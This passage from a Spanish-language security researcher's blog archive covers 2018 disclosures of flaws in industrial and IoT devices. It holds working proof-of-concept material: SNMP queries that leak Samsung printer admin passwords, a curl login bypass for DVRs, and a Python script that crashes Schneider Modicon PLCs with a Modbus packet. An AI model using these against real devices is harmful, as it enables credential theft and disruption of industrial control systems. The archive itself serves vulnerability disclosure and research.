martes, 9 de octubre de 2018

[Qlogic] 4G & 4/8G Fibre Channel Switch Module for IBM BladeCenter (CVE-2018-18202 )

Users (prom, diags and support) are not documented in the Qlogic 4/8G documentation, and those users  have the same login name as password


Affected System:  

  • QLogic(R) 4Gb Fibre Channel Switch Module for IBM BladeCenter(R)
  • QLogic(R) 20-Port 4/8 Gb SAN Switch Module for IBM BladeCenter(R)

jueves, 4 de octubre de 2018

[Siemens] SIMATIC HMI; "HTTP Header Injection" via CRLF

 "HTTP Header Injection", via CRLF (Salto de linea y retorno de carro ) en equipos "SIMANTIC HMI" de la firma Siemens.

miércoles, 3 de octubre de 2018

#Samsung #printer #passwordLeak ( CVE-2018-17969 )


Problemas con el acceso ?



No problema!
Passwords leaks, via SNMP !

Poc 


USUARIO:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0 = STRING: "admin"

PASSWORD:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0 = STRING: "1111"




Challenge success !!!





Saludos,
@capitan_alfa

miércoles, 2 de mayo de 2018

[ 0day ] DVR (#multi)vendor ( CVE-2018-10676 )

Ya estamos al tanto del anterior fallo que atentanta contra miles de DVR, al que le fue asignado el CVE: "CVE-2018-9995".


Fallo involucra a dispositivos de distintos vendors ( TBK Vision, Novo, CeNova, QSee, Pulnix, Securus, Night OWL, etc. )

lunes, 30 de abril de 2018

[update] DVR Login Bypass ( CVE-2018-9995 )

En un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR.

Tan simple como:


$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse.


domingo, 29 de abril de 2018

#Strinbleed, SNMP Protocol "God Mode".

Hoy me levante recordando a #strinbleed, el primer interesante hallazgo que sacamos con el amigo Jose (@bertinjoseb). Esto fue a principios de Abril y recien el marzo/2017 había escrito algo respecto. En ese momento hacia referencia a unos "curiosos" Comunity strings. 

Un tiempo despues salio el CVE-2017-5135 y al hallazgo lo bautizamos como Stringbleed.




martes, 17 de abril de 2018

[schneider] Un poco de Unity XL

Un ciber-delincuente con malas intenciones como podría conectarse a algunos de los miles de PLC Schneider que están expuestos al mundo? Y ademas operarlo, Un opción nativa sera UNITY XL. (el IDE Oficial de Schneider.)





Se tendrá que descargar e instalar el software y luego con un poco de Shodan, ( claro tmb; fofa, censys, google, bing, etc) y equipos no faltaran.

lunes, 9 de abril de 2018

[TBK Vision] DVR Login Bypass ( CVE-2018-9995 )

Estaba en la caza de cierto cacharro ICS/OT y en el camino apareció otro tipo de dispositivo, me refiero a un lindo DVR, del que sin querer salio este POST.


Todo comenzo aqui:




viernes, 6 de abril de 2018

[tool] PlinPlamPlum: "SCADAS "BAS920 & ISC2000"; Credentials Exposed"

Sumando una tool al repo (github.com/ezelf), para explotar un simple fallo (CVE-2017-17974) que traen  SCADAS de la firma “BA SYSTEM”:

El fallo implica enviar una simple peticion a "http://<host>/isc/get_sid_js.aspx",  y finalmente uno consigue hacerse con las credenciales de la plataforma



para que se vea "mas bonito" salio esto:

-------------
------------

sábado, 31 de marzo de 2018

[Tool][Schneider] Dos Modicon via Modbus Injection

PLC Modicon line ("m340" & "m580") suffer a denial of services upon receiving a simple request to the "modbus" protocol.

 # Exploit Title: "Dos Modicon via Modbus Injection" 
 # CVE:                 2018-???? <-- soon !!!
 # CVSS Base Score v3: 8.6 / 10
 # CVSS Vector String: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H  
 # Date: 2/01/2018
 # Exploit Author:      Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
 # Vendor: Schneider Electric
 # devices(tested): PLC Modicon m340 (v2.0 > v2.8) & modicom m580 & Quantum (fix v2.42)




Exploit:
import socket 

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
client.connect(("192.168.0.101",502)) 
client.send( "\x44\x62\x00\x00\x00\x06\x00\x5a\x00\x20\x00\x00") 
client.close()




M340                                                                                              m580

Tested in:

[+] m430
BMX P34 2020 v2.0 (TELEMECANIQUE)         
BMX P34 2020 v2.1                          
BMX P34 2020 v2.2                          
...                                        --
BMX P34 2020 v2.4                          
BMX P34 2020 v2.5                          
BMX P34 2020 v2.6                          
BMX P34 2020 v2.7                           
BMX P34 2020 v2.8                          
-------------------------------

[+] m580
BME P58 2020 v01.04
BME P58 2020 v02.20
BME P58 4040 v02.20
BME P58 4040 v02.12

sábado, 17 de marzo de 2018

Leaking Facebook Internal Ip Infrastructure - no bounty payment from facebook _(english - google)

An attacker can receive confidential information about the international network through the BIG-IP LTM persistence cookie. 

Cookies that are not inside a website. Instead, they have been sent by an intermediary: The load balance of the signature F5, who always has the possibility of finding the client and the service that finally wants to connect us 

Then it is the balancer that defines for us (client) a host from an http / apps group. 

In addition to determining the most optimal path, one each time a cookie is requested that reaches our client as value an IP and PORT confused / encoded, identifying the host (that the balancer defined for our request) from where the resources that we we have called 

[Facebook][ F5 BIG-IP ] PERSISTENCE COOKIE INFORMATION LEAKAGE

( El titulo alternativo era:
Leaking Facebook Internal Ip Infrastructure - no bounty payment from facebook )

Fugas de información de cookies de persistencia (en Facebook )

Un atacante puede recibir información confidencial sobre la red interna a través de la cookie de persistencia BIG-IP LTM.

Cookies que no nacen dentro de un aplicativo web. En cambio son seteadas por un intermediario: El balanceador de carga de la firma F5, quien seguramente siempre se encontrara entre el cliente y el servicio al que finalmente nos queremos conectar.

Entonces es el balanceador quien define para nosotros (cliente) un host  de entre un pool http/apps.
Además de determinar el camino mas optimo, a cada una de nuestras peticiones se le setea una cookie que al llegar a nuestro cliente trae como valor una IP y PUERTO ofuscados/encodeados, identificando al host (que el balanceador definió para nuestro request ) desde donde llegan los recursos que nosotros  inicialmente llamamos.   

Esas cookies en su respuesta traen valores encodeados y existe una documentación oficial al respecto; https://support.f5.com/csp/article/K6917?sr=19342610.

sábado, 24 de febrero de 2018

[Javascript] XSS; True. Y ahora, que ?

El mundo del Pentesting lo encuentro super apasionante, siempre un desafió nuevo. Siempre con las mismas energias desde del primer dia (y sumando). 
Claro también toca lidiar con la documentación 😭😭 . En donde se debe detallar de manera amigable los distintos hallazgos.

Cuando me toca documentar a los ultra famosos XSS, en las POCs, solía poner un clásico "alert()", con algún amigable mensaje.



domingo, 18 de febrero de 2018

[ BACnet ] Entrando en materia.

Hace un tiempo que vengo jugando con MODBUS, ( antes escribi algo al respecto ), Ahora a la investigación que llevamos con el amigo Jose (@bertinjoseb), empezamos a sumarle nuevos protocolos.
Uno de ellos fue BACnet.
El post de hoy sera un volcado rapido de algunas de las cosas (practicas) que encontramos.


Exposicion (shodan):  



jueves, 15 de febrero de 2018

[Android] Codigos Android

Hace unos días encontré (en hackplayers.com ), una interesante lista de códigos y desde entonces mantengo la pestaña con el articulo para no perderla de vista.

"dos pájaros de un tiro": cierro pestaña y levanto un post:



 A continuación comparto la dichosa lista:

miércoles, 14 de febrero de 2018

[steelcase] Sala por favor !!

Querías reservar una sala para coordinar una reunión secreta  ? Osea creíste que seria secreta ?



Cuéntame mas:

Para los que no conozcan estos dispositivos que suelen estar en la entrada de salas de reuniones, se los voy a presentar con dos comerciales (bonitos):


***

domingo, 11 de febrero de 2018

[Netbiter][ICS/OT] API_KEY INDEXADA

Otro post dedicado a OT, (aunque sin hablar de vulnerabilidades en el sentido estricto de la palabra), dedicado al vendor NETBITER.

Netbiter cuenta con una API (rest/soap), que nos permite recolectar los datos del equipo (netbiter) que tengamos instalado (y previamente asociado/registrado al server ). 

[SCADA] #(multi)vendor, vuln: Remote Command Execution ( CVE-2017-17888 )

El pasado año junto al colega @bertinjoseb, le pusimos energía a unos interesantes SCADAS, al que enseguida conseguimos explotar un LFI ( CVE-2017-9097 ),  fallo al que tambien le dedique un POST.

Pero no nos quedamos con un "simple" LFI y seguimos trabajando sobre esos dispositivos y conseguimos un hermoso RCE ( CVE-2017-17888 )

El FrontEnd web de estos SCADAS corren sobre servidores web "Anti-web". 
Al ingresar el mecanismo de "seguridad" que traen nos pide  credenciales de acceso que dependiendo del vendor tendra el siguiente aspecto:

viernes, 9 de febrero de 2018

[Telefonica] Telco rules. -no bounties-

Voy a comenzar contando que tengo especial simpatía con muchos de lo profesionales que trabajan en #Telefonica. Quiero decir sigo sus charlas, videos, post, etc.
Sin duda es una empresa con profesionales de primera linea. Por lo tanto (yo newbie ) en mi humilde opinión dar con hallazgos en materia de [in]seguridad es todo un desafio.

Por cierto; no es la primera vez que se me da por escribir de Telefonica. Por ejemplo recientemente encontré como se les estaban fugando IP Internas, gracias a unas cookies que les agregaba su balanceador:


lunes, 5 de febrero de 2018

[OT][OMRON] Login Bypass

Ya lo repetimos mucho, para un atacante dar con vulnerabilidades sobre tecnología ICS/OT mayormente resulta algo trivial.

Como lo demuestra recientemente Jose (@bertinjoseb). Su hallazgo permitía bypasear el login y conseguir ver paneles similares al siguiente:

Ejemplo de panel vulnerable:


domingo, 28 de enero de 2018

[ F5 BIG-IP ] COOKIE REMOTE INFORMATION DISCLOSURE, (en #Telefonica tmb)

Las organizaciones procuran contrarrestar las fugas de información y esto para la mayoría no es ninguna novedad. Estas fugas pueden salir de lugares totalmente insospechados

En las distintas evaluaciones de seguridad siempre busco cubrir y poner foco a cada detalle. Recientemente re-descubrí uno viejo y quiero compartirlo.


Del "detalle" del que hoy voy a escribir son de unas curiosas cookies que conocen infraestructura interna y la presentan al mundo. 


martes, 16 de enero de 2018

[#SeaTel/cobham] Donde esta mi barco ? - edicion en pausa --

Armando un escenario: Luego de una larga noche de "joda" (mucho "carrete", le dicen en Chile ) el Capitan se olvido donde  dejo su barco .  
Por suerte en varios de sus dispositivos se encuentra el histórico del ingreso panel de administración de Seatel. El problema es que ni por casualidad recuerda las contraseñas. Y el tipo no sabe de los mecanismos que antes presente para poder acceder/bypassear el panel.   


lunes, 15 de enero de 2018

[Schneider]PLC DOS via Modbus injection

Conociendo mejor la estructura de la trama Modbus, con la herramienta que en el post anterior les presente, comence a testear  dispositivos de Schneider Electric, haciendo uso de la función 90 (\x5a) (fuzzeando manualmente ) y tomando nota de aquellas que devolvían respuestas validas.

M340, DOWN ( tmb en post anteriores:[1][2] )

[tool]: Eliminando pendientes; Jugando con Modbus/tcp

Tengo gran lista de pendientes, en su mayoría  de carácter informático. (He estado repitiendo que mis días necesitan mas horas  -y mas coordinación-). 
De esa lista de pendientes que menciono, recientemente retome un viejo proyecto; Una tool para conversar con el protocolo Modbus/tcp.
No quiero reinventar ninguna rueda, simplemente busco conocer mejor el protocolo y no solo teóricamente.

La documentación oficial del protocolo la encontramos en: http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b.pdfy es muy amigable.teoricamenteteoricamente

Como extra recomiendo una interesante talk de una persona a la que le tengo muchísimo respeto, me refiero a Claudio Caracciolo (@holesec), presentando distintos protocolos industriales:




Al momento de escribir este post (15/01/2018), en Shodan encontramos unos 18mil dispositivos indexados corriendo Modbus sobre su puerto por defecto. De mas esta decir que muchos de estos devices siempre tendrán la posibilidad de cambiar este puerto (al 503 por ejemplo).  

sábado, 6 de enero de 2018

martes, 2 de enero de 2018

[Schneider] Gateway TSXETG100: Cross Protocol Injection

CPI (Cross Protocol injection), es un interesante mecanismo para explotar XSS, del que ya escribí en otras oportunidades. [1], [2].

Son muchos los equipos vulnerables a CPI. hoy voy a presentar otro de Schneider Electric:

Schneider Electric - TSXETG100

lunes, 1 de enero de 2018

BRICKSTREAM; "RECUENTO Y SEGUIMIENTO DE PERSONAS"

Temas como [hiper]vigilancia, privacidad, anonimato son temas que a muchas personas les preocupa y yo no soy ajeno a ello. Me picaba el tema y me puse a buscar ejemplos funcionales de seguimiento.

Los primero que me tope (ya lo sabíamos) eran los chinos, mirando todo (con cara de sospecha XD ):